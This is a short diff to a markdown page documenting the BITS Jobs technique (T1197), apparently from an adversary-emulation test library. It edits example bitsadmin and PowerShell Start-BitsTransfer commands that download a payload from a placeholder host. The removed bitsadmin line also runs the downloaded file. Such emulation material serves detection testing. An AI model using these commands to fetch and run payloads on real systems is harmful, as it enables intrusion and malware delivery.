--- a/Techniques/T1197/T1197.md
+++ b/Techniques/T1197/T1197.md
@@ -10,14 +10,14 @@
 ## BITSAdmin
 Download a payload leveraging BITSAdmin:
 ```
-bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe & %ALLUSERSPROFILE%\example.exe
+bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe
 ```
 
 ## PowerShell
 Download a payload leveraging PowerShell:
 ```
 powershell
-Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination C:\clientdir\example.exe
+Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination %ALLUSERSPROFILE%\example.exe
 ```
 
 # References
